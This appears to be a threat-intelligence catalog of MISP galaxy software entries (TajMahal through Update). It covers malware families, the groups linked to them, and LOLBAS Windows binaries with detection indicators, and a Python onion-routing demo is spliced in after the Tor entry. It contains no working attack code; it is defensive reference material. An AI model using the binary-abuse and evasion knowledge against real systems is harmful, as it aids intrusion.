[TajMahal](https://app.tidalcyber.com/software/b1b7a8d9-6df3-4e89-8622-a6eea3da729b) is a multifunctional spying framework that has been in use since at least 2014. [TajMahal](https://app.tidalcyber.com/software/b1b7a8d9-6df3-4e89-8622-a6eea3da729b) is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.<sup>[[Kaspersky TajMahal April 2019](https://app.tidalcyber.com/references/1ed20522-52ae-4d0c-b42e-c680490958ac)]</sup>

The tag is: misp-galaxy:software="TajMahal"

Tar.exe - Associated Software

<sup>[[Tar.exe - LOLBAS Project](/references/e5f54ded-3ec1-49c1-9302-6b9f372d5015)]</sup>

The tag is: misp-galaxy:software="Tar.exe - Associated Software"

Tar

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to extract and create archives.

Author: Brian Lucero

Paths:

* C:\Windows\System32\tar.exe

Detection:

* IOC: tar.exe extracting files from a remote host within the environment<sup>[[Tar.exe - LOLBAS Project](/references/e5f54ded-3ec1-49c1-9302-6b9f372d5015)]</sup>

The tag is: misp-galaxy:software="Tar"

Tarrask

[Tarrask](https://app.tidalcyber.com/software/7bb9d181-4405-4938-bafb-b13cc98b6cd8) is malware that has been used by [HAFNIUM](https://app.tidalcyber.com/groups/1bcc9382-ccfe-4b04-91f3-ef1250df5e5b) since at least August 2021. [Tarrask](https://app.tidalcyber.com/software/7bb9d181-4405-4938-bafb-b13cc98b6cd8) was designed to evade digital defenses and maintain persistence by generating concealed scheduled tasks.<sup>[[Tarrask scheduled task](https://app.tidalcyber.com/references/87682623-d1dd-4ee8-ae68-b08be5113e3e)]</sup>

The tag is: misp-galaxy:software="Tarrask"

Tasklist

The [Tasklist](https://app.tidalcyber.com/software/abae8f19-9497-4a71-82b6-ae6edd26ad98) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. <sup>[[Microsoft Tasklist](https://app.tidalcyber.com/references/2c09561a-02ee-4948-9745-9d6c8eb2881d)]</sup>

The tag is: misp-galaxy:software="Tasklist"

tcpdump

tcpdump is an open-source network packet analyzer utility run from the command line.

The tag is: misp-galaxy:software="tcpdump"

TDSSKiller

TDSSKiller is a tool used to remove rootkits.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="TDSSKiller"

TDTESS

The tag is: misp-galaxy:software="TDTESS"

te.exe - Associated Software

<sup>[[te.exe - LOLBAS Project](/references/e7329381-319e-4dcc-8187-92882e6f2e12)]</sup>

The tag is: misp-galaxy:software="te.exe - Associated Software"

te

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF).

Author: Oddvar Moe

Paths:

* no default

Detection:

* Sigma: proc_creation_win_susp_use_of_te_bin.yml<sup>[[te.exe - LOLBAS Project](/references/e7329381-319e-4dcc-8187-92882e6f2e12)]</sup>

The tag is: misp-galaxy:software="te"

Teams.exe - Associated Software

<sup>[[Teams.exe - LOLBAS Project](/references/ceee2b13-331f-4019-9c27-af0ce8b25414)]</sup>

The tag is: misp-galaxy:software="Teams.exe - Associated Software"

Teams

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Electron runtime binary which runs the Teams application

Author: Andrew Kisliakov

Paths:

* %LOCALAPPDATA%\Microsoft\Teams\current\Teams.exe

Detection:

* IOC: %LOCALAPPDATA%\Microsoft\Teams\current\app directory created
* IOC: %LOCALAPPDATA%\Microsoft\Teams\current\app.asar file created/modified by non-Teams installer/updater
* Sigma: proc_creation_win_susp_electron_exeuction_proxy.yml<sup>[[Teams.exe - LOLBAS Project](/references/ceee2b13-331f-4019-9c27-af0ce8b25414)]</sup>

The tag is: misp-galaxy:software="Teams"

TeamViewer

TeamViewer is a tool used to enable remote connections to network devices for support and administration.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="TeamViewer"

TEARDROP

[TEARDROP](https://app.tidalcyber.com/software/bae20f59-469c-451c-b4ca-70a9a04a1574) is a memory-only dropper that was discovered on some victim machines during investigations related to the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a). It was likely used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least May 2020.<sup>[[FireEye SUNBURST Backdoor December 2020](https://app.tidalcyber.com/references/d006ed03-a8af-4887-9356-3481d81d43e4)]</sup><sup>[[Microsoft Deep Dive Solorigate January 2021](https://app.tidalcyber.com/references/ddd70eef-ab94-45a9-af43-c396c9e3fbc6)]</sup>

The tag is: misp-galaxy:software="TEARDROP"

Teleport

Teleport is a custom tool for data exfiltration. It has been observed in use during intrusions involving Truebot, a botnet and loader malware, in 2022 and 2023.<sup>[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]</sup>

The tag is: misp-galaxy:software="Teleport"

TestWindowRemoteAgent.exe - Associated Software

<sup>[[TestWindowRemoteAgent.exe - LOLBAS Project](/references/0cc891bc-692c-4a52-9985-39ddb434294d)]</sup>

The tag is: misp-galaxy:software="TestWindowRemoteAgent.exe - Associated Software"

TestWindowRemoteAgent

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC

Author: Onat Uzunyayla

Paths:

* C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe

Resources: None Provided

Detection:

* IOC: TestWindowRemoteAgent.exe spawning unexpectedly<sup>[[TestWindowRemoteAgent.exe - LOLBAS Project](/references/0cc891bc-692c-4a52-9985-39ddb434294d)]</sup>

The tag is: misp-galaxy:software="TestWindowRemoteAgent"

TEXTMATE

[TEXTMATE](https://app.tidalcyber.com/software/49d0ae81-d51b-4534-b1e0-08371a47ef79) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://app.tidalcyber.com/software/a4700431-6578-489f-9782-52e394277296) in February 2017. <sup>[[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)]</sup>

The tag is: misp-galaxy:software="TEXTMATE"

EvilQuest - Associated Software

The tag is: misp-galaxy:software="EvilQuest - Associated Software"

MacRansom.K - Associated Software

<sup>[[SentinelOne EvilQuest Ransomware Spyware 2020](https://app.tidalcyber.com/references/4dc26c77-d0ce-4836-a4cc-0490b6d7f115)]</sup>

The tag is: misp-galaxy:software="MacRansom.K - Associated Software"

ThiefQuest

[ThiefQuest](https://app.tidalcyber.com/software/2ed5f691-68eb-49dd-b730-793dc8a7d134) is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. [ThiefQuest](https://app.tidalcyber.com/software/2ed5f691-68eb-49dd-b730-793dc8a7d134) was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.<sup>[[Reed thiefquest fake ransom](https://app.tidalcyber.com/references/b265ef93-c1fb-440d-a9e0-89cf25a3de05)]</sup> Even though [ThiefQuest](https://app.tidalcyber.com/software/2ed5f691-68eb-49dd-b730-793dc8a7d134) presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.<sup>[[wardle evilquest partii](https://app.tidalcyber.com/references/4fee237c-c2ec-47f5-b382-ec6bd4779281)]</sup><sup>[[reed thiefquest ransomware analysis](https://app.tidalcyber.com/references/47b49df4-34f1-4a89-9983-e8bc19aadf8c)]</sup>

The tag is: misp-galaxy:software="ThiefQuest"

ThreatNeedle

[ThreatNeedle](https://app.tidalcyber.com/software/b31c7b8e-dbdd-4ad5-802e-dcdc72b7462e) is a backdoor that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08)'s Manuscrypt (a.k.a. NukeSped) malware family.<sup>[[Kaspersky ThreatNeedle Feb 2021](https://app.tidalcyber.com/references/ba6a5fcc-9391-42c0-8b90-57b729525f41)]</sup>

The tag is: misp-galaxy:software="ThreatNeedle"

ThunderShell

ThunderShell is a tool used to facilitate remote access via HTTP requests.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="ThunderShell"

TightVNC

According to its project page, TightVNC is a free and open-source remote desktop software tool that is Virtual Network Computing (VNC)-compatible. It is designed to enable remote access to other systems.<sup>[[TightVNC Software Project Page](/references/e1725230-4f6c-47c5-8e30-90dfb01a75d7)]</sup>

The tag is: misp-galaxy:software="TightVNC"

TinyTurla

[TinyTurla](https://app.tidalcyber.com/software/39f0371c-b755-4655-a97e-82a572f2fae4) is a backdoor that has been used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) against targets in the US, Germany, and Afghanistan since at least 2020.<sup>[[Talos TinyTurla September 2021](https://app.tidalcyber.com/references/94cdbd73-a31a-4ec3-aa36-de3ea077c1c7)]</sup>

The tag is: misp-galaxy:software="TinyTurla"

TINYTYPHON

[TINYTYPHON](https://app.tidalcyber.com/software/0e009cb8-848e-427a-9581-d3a4fd9f6a87) is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. <sup>[[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]</sup>

The tag is: misp-galaxy:software="TINYTYPHON"

TinyZBot

The tag is: misp-galaxy:software="TinyZBot"

Tomiris

[Tomiris](https://app.tidalcyber.com/software/eff417ad-c775-4a95-9f36-a1b5a675ba82) is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between [Tomiris](https://app.tidalcyber.com/software/eff417ad-c775-4a95-9f36-a1b5a675ba82) and GoldMax.<sup>[[Kaspersky Tomiris Sep 2021](https://app.tidalcyber.com/references/a881a7e4-a1df-4ad2-b67f-ef03caddb721)]</sup>

The tag is: misp-galaxy:software="Tomiris"

Tor

[Tor](https://app.tidalcyber.com/software/8c70d85b-b06d-423c-8bab-ecff18f332d6) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://app.tidalcyber.com/software/8c70d85b-b06d-423c-8bab-ecff18f332d6) utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. <sup>[[Dingledine Tor The Second-Generation Onion Router](https://app.tidalcyber.com/references/ffb6a26d-2da9-4cce-bb2d-5280e9cc16b4)]</sup>

The tag is: misp-galaxy:software="Tor"
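The layered encryption described in the Tor entry above, as an added example that is not part of the original page and is not Tor project code: a toy three-hop circuit in which the client wraps a message once per relay and each relay peels exactly one layer, learning only the next hop. The relay names, the pre-shared keys, and the HMAC-SHA256 counter-mode XOR stream standing in for real symmetric encryption are assumptions made for the demo; the real protocol negotiates keys per hop and uses a fixed cell format.

```python
"""Toy onion-routing walkthrough for the Tor entry above.

Added example; it is not Tor project code and does not reproduce Tor's real
cell format. Assumptions (not from the page): a three-hop circuit
guard -> middle -> exit, pre-shared per-hop keys instead of Tor's handshake,
and a keyed XOR stream built from HMAC-SHA256 in counter mode standing in
for real symmetric encryption. Do not reuse keystream_xor outside this demo.
"""
import hashlib
import hmac
import json


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Symmetric toy stream cipher: the same call encrypts and decrypts."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hmac.new(key, counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def build_onion(route, destination: str, message: bytes) -> bytes:
    """Client side: wrap the message once per hop, innermost layer for the exit.

    route is an ordered list of (relay_name, relay_key). Each layer carries only
    the name of the next hop plus an opaque payload, so a relay that peels its
    own layer learns its two neighbours and nothing about the rest of the path.
    """
    blob, next_hop = message, destination
    for name, key in reversed(route):  # exit layer first, guard layer last
        layer = json.dumps({"next": next_hop, "payload": blob.hex()}).encode()
        blob, next_hop = keystream_xor(key, layer), name
    return blob  # handed to route[0], the guard


def peel(relay_key: bytes, blob: bytes):
    """Relay side: strip exactly one layer; returns (next_hop, inner_blob)."""
    layer = json.loads(keystream_xor(relay_key, blob))
    return layer["next"], bytes.fromhex(layer["payload"])


def can_read(relay_key: bytes, blob: bytes) -> bool:
    """True only if the blob's outermost layer was encrypted for this key."""
    try:
        peel(relay_key, blob)
        return True
    except (ValueError, KeyError, TypeError):
        return False


def route_onion(route, blob: bytes):
    """Simulate the circuit: every relay peels its layer and forwards.

    Returns (destination, cleartext, hops); hops records what each relay saw:
    its own name, the next hop, and the size of the still-opaque payload.
    """
    keys = dict(route)
    hop, hops = route[0][0], []
    while hop in keys:
        next_hop, blob = peel(keys[hop], blob)
        hops.append((hop, next_hop, len(blob)))
        hop = next_hop
    return hop, blob, hops


# Constructed sample circuit and message (demo keys, not real key material).
ROUTE = [("guard", b"demo-key-guard"),
         ("middle", b"demo-key-middle"),
         ("exit", b"demo-key-exit")]
MESSAGE = b"GET / HTTP/1.1\r\nHost: example.org\r\n\r\n"

if __name__ == "__main__":
    onion = build_onion(ROUTE, "example.org", MESSAGE)
    dest, clear, hops = route_onion(ROUTE, onion)
    for name, nxt, size in hops:
        print(f"{name:6} -> {nxt:12} (forwards {size} opaque bytes)")
    print("exit delivers to", dest, ":", clear)
    print("middle can read the guard's layer?", can_read(ROUTE[1][1], onion))
```

The point the demo makes concrete is the one in the entry: the guard sees the client and the middle relay but only an opaque blob, the exit sees the cleartext and the destination but not the client, and no single relay's key opens any layer other than its own.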

Torisma

[Torisma](https://app.tidalcyber.com/software/4bce135b-91ba-45ae-88f9-09e01f983a74) is a second stage implant designed for specialized monitoring that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08). [Torisma](https://app.tidalcyber.com/software/4bce135b-91ba-45ae-88f9-09e01f983a74) was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.<sup>[[McAfee Lazarus Nov 2020](https://app.tidalcyber.com/references/a283d229-3a2a-43ef-bcbe-aa6d41098b51)]</sup>

The tag is: misp-galaxy:software="Torisma"

Tracker.exe - Associated Software

<sup>[[LOLBAS Tracker](/references/f0e368f1-3347-41ef-91fb-995c3cb07707)]</sup>

The tag is: misp-galaxy:software="Tracker.exe - Associated Software"

Tracker

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Tool included with Microsoft .Net Framework.

Author: Oddvar Moe

Paths: * no default

Detection: * Sigma: proc_creation_win_lolbin_tracker.yml<sup>[[LOLBAS Tracker](/references/f0e368f1-3347-41ef-91fb-995c3cb07707)]</sup>

The tag is: misp-galaxy:software="Tracker"

TrailBlazer

[TrailBlazer](https://app.tidalcyber.com/software/7a6ae9f8-5f8b-4e94-8716-d8ee82027197) is a modular malware that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2019.<sup>[[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]</sup>

The tag is: misp-galaxy:software="TrailBlazer"

TSPY_TRICKLOAD - Associated Software

The tag is: misp-galaxy:software="TSPY_TRICKLOAD - Associated Software"

Totbrick - Associated Software

The tag is: misp-galaxy:software="Totbrick - Associated Software"

TrickBot

[TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to [Dyre](https://app.tidalcyber.com/software/38e012f7-fb3a-4250-a129-92da3a488724). [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) was developed and initially used by [Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of "big game hunting" ransomware campaigns.<sup>[[S2 Grupo TrickBot June 2017](https://app.tidalcyber.com/references/28faff77-3e68-4f5c-974d-dc7c9d06ce5e)]</sup><sup>[[Fidelis TrickBot Oct 2016](https://app.tidalcyber.com/references/839c02d1-58ec-4e25-a981-0276dbb1acc8)]</sup><sup>[[IBM TrickBot Nov 2016](https://app.tidalcyber.com/references/092aec63-aea0-4bc9-9c05-add89b4233ff)]</sup><sup>[[CrowdStrike Wizard Spider October 2020](https://app.tidalcyber.com/references/5c8d67ea-63bc-4765-b6f6-49fa5210abe6)]</sup>

The tag is: misp-galaxy:software="TrickBot"

xFrost - Associated Software

The tag is: misp-galaxy:software="xFrost - Associated Software"

Karagany - Associated Software

The tag is: misp-galaxy:software="Karagany - Associated Software"

Trojan.Karagany

[Trojan.Karagany](https://app.tidalcyber.com/software/b88c4891-40da-4832-ba42-6c6acd455bd1) is a modular remote access tool used for recon and linked to [Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1). The source code for [Trojan.Karagany](https://app.tidalcyber.com/software/b88c4891-40da-4832-ba42-6c6acd455bd1) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. <sup>[[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)]</sup><sup>[[Secureworks Karagany July 2019](https://app.tidalcyber.com/references/61c05edf-24aa-4399-8cdf-01d27f6595a1)]</sup><sup>[[Dragos DYMALLOY ](https://app.tidalcyber.com/references/d2785c6e-e0d1-4e90-a2d5-2c302176d5d3)]</sup>

The tag is: misp-galaxy:software="Trojan.Karagany"

Trojan.Mebromi

[Trojan.Mebromi](https://app.tidalcyber.com/software/f8a4213d-633b-4e3d-8e59-a769e852b93b) is BIOS-level malware that takes control of the victim system before the Master Boot Record (MBR) is loaded. <sup>[[Ge 2011](https://app.tidalcyber.com/references/dd6032fb-8913-4593-81b9-86d1239e01f4)]</sup>

The tag is: misp-galaxy:software="Trojan.Mebromi"

TRUECORE - Associated Software

<sup>[[The DFIR Report Truebot June 12 2023](/references/a6311a66-bb36-4cad-a98f-2b0b89aafa3d)]</sup>

The tag is: misp-galaxy:software="TRUECORE - Associated Software"

Silence - Associated Software

<sup>[[The DFIR Report Truebot June 12 2023](/references/a6311a66-bb36-4cad-a98f-2b0b89aafa3d)]</sup>

The tag is: misp-galaxy:software="Silence - Associated Software"

Truebot

Truebot is a botnet often used as a loader for other malware. In July 2023, U.S. authorities released joint Cybersecurity Advisory AA23-187A, which detailed increased observations of new Truebot variants infecting organizations in the United States and Canada. Authorities assessed that Truebot infections are primarily motivated around collection and exfiltration of sensitive victim data for financial gain. Officials also assessed that actors were using both spearphishing emails containing malicious hyperlinks and exploitation of CVE-2022-31199 (a vulnerability in the IT auditing application Netwrix Auditor) to deliver Truebot during these attacks. Additional tools associated with the attacks included Raspberry Robin for initial infections; FlawedGrace and Cobalt Strike for various post-exploitation activities; and Teleport, a custom tool for data exfiltration.<sup>[[U.S. CISA Increased Truebot Activity July 6 2023](/references/6f9b8f72-c55f-4268-903e-1f8a82efa5bb)]</sup>

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/truebot/

The tag is: misp-galaxy:software="Truebot"

Truvasys

[Truvasys](https://app.tidalcyber.com/software/50844dba-8999-42ba-ba29-511e3faf4bc3) is first-stage malware that has been used by [PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0). It is a collection of modules written in the Delphi programming language. <sup>[[Microsoft Win Defender Truvasys Sep 2017](https://app.tidalcyber.com/references/3c8ba6ef-8edc-44bf-9abe-655ba0f45912)]</sup> <sup>[[Microsoft NEODYMIUM Dec 2016](https://app.tidalcyber.com/references/87c9f8e4-f8d1-4f19-86ca-6fd18a33890b)]</sup> <sup>[[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)]</sup>

The tag is: misp-galaxy:software="Truvasys"

TSCookie

[TSCookie](https://app.tidalcyber.com/software/9872ab5a-c76e-4404-91f9-5b745722443b) is a remote access tool (RAT) that has been used by [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) in campaigns against Japanese targets.<sup>[[JPCert TSCookie March 2018](https://app.tidalcyber.com/references/ff1717f7-0d2e-4947-87d7-44576affe9f8)]</sup><sup>[[JPCert BlackTech Malware September 2019](https://app.tidalcyber.com/references/26f44bde-f723-4854-8acc-3d95e5fa764a)]</sup> [TSCookie](https://app.tidalcyber.com/software/9872ab5a-c76e-4404-91f9-5b745722443b) has been referred to as [PLEAD](https://app.tidalcyber.com/software/9a890a85-afbe-4c35-a3e7-1adad481bdf7), though more recent reporting indicates a separation between the two.<sup>[[JPCert PLEAD Downloader June 2018](https://app.tidalcyber.com/references/871f4af2-ed99-4256-a74d-b8c0816a82ab)]</sup><sup>[[JPCert BlackTech Malware September 2019](https://app.tidalcyber.com/references/26f44bde-f723-4854-8acc-3d95e5fa764a)]</sup>

The tag is: misp-galaxy:software="TSCookie"

TShark

TShark is the command-line network protocol analyzer distributed with Wireshark; it captures and dissects packets without a graphical interface.

The tag is: misp-galaxy:software="TShark"

Ttdinject.exe - Associated Software

<sup>[[Ttdinject.exe - LOLBAS Project](/references/3146c9c9-9836-4ce5-afe6-ef8f7b4a7b9d)]</sup>

The tag is: misp-galaxy:software="Ttdinject.exe - Associated Software"

Ttdinject

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows 10 version 1809 and newer for Time Travel Debugging (the underlying binary invoked by tttracer.exe)

Author: Maxime Nadeau

Paths: * C:\Windows\System32\ttdinject.exe * C:\Windows\Syswow64\ttdinject.exe

Detection: * Sigma: [create_remote_thread_win_ttdinjec.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml) * Sigma: [proc_creation_win_lolbin_ttdinject.yml](https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml) * IOC: Parent child relationship. Ttdinject.exe parent for executed command * IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process<sup>[[Ttdinject.exe - LOLBAS Project](/references/3146c9c9-9836-4ce5-afe6-ef8f7b4a7b9d)]</sup>

The tag is: misp-galaxy:software="Ttdinject"

Tttracer.exe - Associated Software

<sup>[[Tttracer.exe - LOLBAS Project](/references/7c88a77e-034e-4847-8bd7-1be3a684a158)]</sup>

The tag is: misp-galaxy:software="Tttracer.exe - Associated Software"

Tttracer

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows 10 version 1809 and newer for Time Travel Debugging

Author: Oddvar Moe

Paths: * C:\Windows\System32\tttracer.exe * C:\Windows\SysWOW64\tttracer.exe

Detection: * Sigma: [proc_creation_win_lolbin_tttracer_mod_load.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml) * Sigma: [image_load_tttracer_mod_load.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml) * Elastic: [credential_access_cmdline_dump_tool.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml) * IOC: Parent child relationship. Tttracer parent for executed command<sup>[[Tttracer.exe - LOLBAS Project](/references/7c88a77e-034e-4847-8bd7-1be3a684a158)]</sup>

The tag is: misp-galaxy:software="Tttracer"

Turian

[Turian](https://app.tidalcyber.com/software/571a45a7-68c9-452c-99bf-1d5b5fdd08b3) is a backdoor that has been used by [BackdoorDiplomacy](https://app.tidalcyber.com/groups/e5b0da2b-12bc-4113-9459-9c51329c9ae0) to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, [Turian](https://app.tidalcyber.com/software/571a45a7-68c9-452c-99bf-1d5b5fdd08b3) is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.<sup>[[ESET BackdoorDiplomacy Jun 2021](https://app.tidalcyber.com/references/127d4b10-8d61-4bdf-b5b9-7d86bbc065b6)]</sup>

The tag is: misp-galaxy:software="Turian"

TYPEFRAME

The tag is: misp-galaxy:software="TYPEFRAME"

UACMe

[UACMe](https://app.tidalcyber.com/software/5788edee-d1b7-4406-9122-bee596362236) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. <sup>[[Github UACMe](https://app.tidalcyber.com/references/7006d59d-3b61-4030-a680-5dac52133722)]</sup>

The tag is: misp-galaxy:software="UACMe"

UBoatRAT

[UBoatRAT](https://app.tidalcyber.com/software/5214ae01-ccd5-4e97-8f9c-14eb16e75544) is a remote access tool that was identified in May 2017.<sup>[[PaloAlto UBoatRAT Nov 2017](https://app.tidalcyber.com/references/235a1129-2f35-4861-90b8-1f761d89b0f9)]</sup>

The tag is: misp-galaxy:software="UBoatRAT"

Umbreon

A Linux rootkit that provides backdoor access and hides from defenders.

The tag is: misp-galaxy:software="Umbreon"

Unknown Logger

[Unknown Logger](https://app.tidalcyber.com/software/846b3762-3949-4501-b781-6dca22db088f) is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. <sup>[[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]</sup>

The tag is: misp-galaxy:software="Unknown Logger"

Unregmp2.exe - Associated Software

<sup>[[Unregmp2.exe - LOLBAS Project](/references/9ad11187-bf91-4205-98c7-c7b981e4ab6f)]</sup>

The tag is: misp-galaxy:software="Unregmp2.exe - Associated Software"

Unregmp2

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Windows Media Player Setup Utility

Author: Wade Hickey

Paths: * C:\Windows\System32\unregmp2.exe * C:\Windows\SysWOW64\unregmp2.exe

Detection: * Sigma: [proc_creation_win_lolbin_unregmp2.yml](https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml) * IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of unregmp2.exe /HideWMP<sup>[[Unregmp2.exe - LOLBAS Project](/references/9ad11187-bf91-4205-98c7-c7b981e4ab6f)]</sup>

The tag is: misp-galaxy:software="Unregmp2"

Update.exe - Associated Software

<sup>[[Update.exe - LOLBAS Project](/references/2c85d5e5-2cb2-4af7-8c33-8aaac3360706)]</sup>

The tag is: misp-galaxy:software="Update.exe - Associated Software"

Update

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

Author: Oddvar Moe

Paths: * %localappdata%\Microsoft\Teams\update.exe

